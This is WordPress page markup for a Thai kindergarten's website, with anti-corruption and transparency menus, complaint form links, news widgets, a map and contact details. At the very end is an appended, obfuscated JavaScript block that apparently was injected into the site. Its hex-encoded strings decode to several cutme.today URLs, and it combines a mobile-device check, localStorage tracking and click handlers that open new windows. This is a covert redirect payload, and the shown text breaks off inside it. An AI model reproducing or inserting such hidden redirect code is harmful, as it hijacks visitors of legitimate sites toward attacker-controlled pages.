900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\" data-type=\"link\" data-id=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows 